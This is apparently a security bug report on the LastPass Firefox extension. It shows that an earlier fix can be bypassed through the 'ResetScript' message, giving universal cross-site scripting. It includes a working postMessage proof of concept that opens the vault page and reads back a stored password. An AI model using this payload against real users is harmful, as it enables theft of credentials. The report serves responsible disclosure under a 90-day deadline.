The fix for issue 1209 was to prevent loading the special domain `1min-ui-prod.service.lastpass.com`. This works in Chrome, but FireFox loads content scripts into error pages, allowing a similar vulnerability to be exploited.
The list of procedure calls available is completely different, but I noticed that the procedure `ResetScript` will load an arbitrary URL, and then run arbitrary script in it.
This is effectively a UXSS, allowing anyone to compromise any website. But...because the URL being opened is from an extension, it can open non-websafe URLS, e.g. resource://support-at-lastpass-dot-com/data/vault.html. This allows a simple demo where your password can be read back from the vault, e.g.:
w.postMessage({
type: "ResetScript",
data: [
{
appId: 1,
url: "resource://support-at-lastpass-dot-com/data/vault.html",
appName: "exploit",
username: "root",
script: 'javascript:setTimeout(\'document.getElementsByClassName("itemButton edit")[1].click()\', 1000);'
+ 'setTimeout(\'alert(document.getElementById("siteDialogPassword").value)\',2000);'
+ 'throw 1;'
}
]
}, "*")
I uploaded a demo version here (this URL is secret):
https://lock.cmpxchg8b.com/fie5uGae/lastpass.html
It reliably alert()s the password for a random site in my vault.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
|
Deleted:
Windows 7-2017-03-21-15-28-52.png
128 KB
|
Comment 1 by taviso@google.com, Mar 22 2017
Project Member